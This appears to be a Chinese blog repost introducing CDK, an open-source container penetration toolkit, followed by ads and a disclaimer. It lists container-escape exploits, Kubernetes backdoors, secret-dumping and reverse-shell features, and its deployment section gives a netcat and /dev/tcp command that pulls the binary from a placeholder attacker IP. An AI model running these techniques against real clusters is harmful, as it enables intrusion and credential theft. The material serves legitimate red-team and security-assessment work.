文章总结: 本文介绍开源容器渗透测试工具CDK,专为精简容器环境设计,零依赖、多架构支持。工具集成信息收集、漏洞利用、网络工具三大模块,支持容器逃逸、持久化控制、K8s集群横向移动等高危操作,适用于容器安全评估、红队渗透测试与应急响应场景。文章末尾含广告推广内容。
综合评分: 62
文章分类: 渗透测试,红队,云安全,安全工具,应急响应
容器渗透测试神器降临!一款工具搞定容器逃逸、K8s集群接管与云原生安全评估
棉花糖糖糖
棉花糖糖糖
棉花糖网络安全工具箱
2026年9月20日 10:48
四川
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
重点导读免责声明
本工具仅用于合法安全测试,未经授权禁止用于攻击任何系统。
重点导读简介
CDK是一款开源容器渗透工具包,专为在精简容器环境中稳定利用漏洞而设计,零操作系统依赖。工具集成信息收集、漏洞利用、网络工具三大功能模块,支持容器逃逸、持久化控制、K8s集群横向移动等高危操作。
重点导读核心架构
PART 01模块设计
| 模块 | 功能 | 说明 |
| — | — | — |
| Evaluate | 信息收集 | 探测容器内部弱点 |
| Exploit | 漏洞利用 | 容器逃逸与权限提升 |
| Tool | 网络工具 | TCP隧道、HTTP请求、K8s API调用 |
PART 02技术特性
- 零依赖:静态编译,无glibc等系统库要求
- 多架构:支持amd64、arm64等主流平台
- 轻量级:thin版本仅2MB,Serverless场景可用
- 模块化:各模块独立,可按需组合
重点导读Evaluate模块
信息收集模块,自动探测容器安全配置缺陷。
PART 03检测范围
| 类别 | 检测项 |
| — | — |
| 系统信息 | OS版本、用户、进程、环境变量 |
| 权限配置 | Capabilities、内网Namespace |
| 敏感资源 | 挂载点、ServiceAccount、云元数据API |
| K8s配置 | Api-server端点、认证信息、Pod安全策略 |
PART 04使用方式
bashcdk evaluate --full
重点导读Exploit模块
漏洞利用模块,支持多种容器逃逸与集群攻击技术。
PART 05逃逸技术
| 技术 | 编号 | 说明 |
| — | — | — |
| runc CVE-2019-5736 | runc-pwn | Docker Runc漏洞 |
| containerd-shim CVE-2020-15257 | shim-pwn | 容器运行时漏洞 |
| docker.sock攻击 | docker-sock-pwn | 容器逃逸与后门部署 |
| Device Mount | mount-disk | 设备挂载逃逸 |
| Cgroups | mount-cgroup | Cgroups权限逃逸 |
| Procfs | mount-procfs | Procfs伪装逃逸 |
| CAP_DAC_READ_SEARCH | cap-dac-read-search | 任意文件读取 |
| CVE-2022-0492 | abuse-unpriv-userns | 非特权用户命名空间 |
PART 06持久化控制
| 技术 | 编号 | 说明 |
| — | — | — |
| WebShell | webshell-deploy | 部署Web后门 |
| DaemonSet | k8s-backdoor-daemonset | K8s后门守护 |
| Shadow APIServer | k8s-shadow-apiserver | 影子API服务器 |
| CronJob | k8s-cronjob | 定时任务后门 |
| MITM攻击 | k8s-mitm-clusterip | CVE-2020-8554中间人 |
PART 07凭证窃取
| 技术 | 编号 | 说明 |
| — | — | — |
| Registry暴力破解 | registry-brute | 镜像仓库凭证 |
| AK泄露检测 | ak-leakage | 云AccessKey扫描 |
| Etcd token | etcd-get-k8s-token | K8s认证令牌 |
| Secrets导出 | k8s-secret-dump | K8s密钥导出 |
| ConfigMap导出 | k8s-configmap-dump | 配置信息窃取 |
PART 08横向移动
| 技术 | 编号 | 说明 |
| — | — | — |
| RBAC绕过 | k8s-get-sa-token | K8s认证令牌窃取 |
| Kubelet Exec | kubelet-exec | 节点命令执行 |
| 反向Shell | reverse-shell | 远程控制通道 |
重点导读Tool模块
网络工具集,替代容器内缺失的系统命令。
PART 09工具列表
| 命令 | 功能 |
| — | — |
| nc | TCP隧道建立 |
| ps | 进程信息查看 |
| netstat | 网络连接状态 |
| ifconfig | 网络接口信息 |
| vi | 文件编辑 |
| kcurl | K8s API请求 |
| dcurl | Docker HTTP API |
| ucurl | Docker Unix Socket |
| ectl | Etcd键值枚举 |
| probe | 端口扫描 |
重点导读应用场景
PART 10容器安全评估
在已获得容器Shell的情况下,使用evaluate模块全面探测安全配置缺陷,获取下一步攻击路径。
PART 11红队渗透测试
利用exploit模块快速完成容器逃逸、节点权限提升、K8s集群控制等高难度操作。
PART 12应急响应
使用tool模块快速收集容器内网络、进程、凭证信息,支撑事件调查。
重点导读部署方式
PART 13直接投递
将二进制文件直接上传至目标容器:
bashnc -lvp 999 < cdk
# 目标容器内执行
cat < /dev/tcp/your_ip/999 > cdk
chmod a+x cdk
PART 14编译定制
根据需要选择特定模块编译轻量版本:
bashgo build -tags "thin" ./cmd/cdk
重点导读项目地址
本公众号非项目作者,仅做技术分享。
https://github.com/cdk-team/CDK
广告时间
低价考证包括但不限于CISP系列、PMP等等国内网安证书、网络安全交流群请关注公众号后点菜单栏的找棉花糖。
糖心会员站,网络安全必备网站,包括在线内网靶场、web靶场、src靶场、应急响应靶场,以及各种网安资料、教程、方案模版、以及超级多在线工具,99元包年!详细介绍:棉花糖会员站介绍(26年4月26日版本) :在线内网靶场、网安资料方案、在线工具全能资源站,看完介绍百分百心动!
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:棉花糖网络安全工具箱 棉花糖糖糖
棉花糖糖糖《容器渗透测试神器降临!一款工具搞定容器逃逸、K8s集群接管与云原生安全评估》